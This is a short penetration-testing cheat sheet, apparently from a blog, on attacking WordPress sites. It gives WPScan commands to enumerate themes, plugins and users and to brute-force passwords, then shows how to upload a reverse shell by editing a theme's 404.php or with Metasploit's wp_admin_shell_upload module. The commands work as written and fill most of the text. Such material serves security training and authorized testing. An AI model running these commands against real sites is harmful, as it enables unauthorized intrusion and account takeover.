Learn how to execute the most commons WordPress attacks from username enumeration to upaload a reverse shell into the target b0x.
Install WPscan
apt install wpscan -y
WPscan Parameters
wpscan -h
Update WPscan
wpscan --update
Enumerate WordPress using WPscan
Version
All Themes Installed
wpscan --url http://poplabsec.com -e t
Vulnerable Themes Installed
wpscan --url http://poplabsec.com -e vt
All Plugins Installed
wpscan --url http://poplabsec.com -e p
Vulnerable Themes Installed
wpscan --url http://poplabsec.com -e vp
WordPress Users
wpscan --url http://poplabsec.com -e u
Brute Force WordPress Passwords
wpscan --url http://poplabsec.com --passwords path-to-wordlist
Help with Metasploit
Upload Reverse Shell to WordPress
Upload Manually
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php
Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
Wordlists
Comments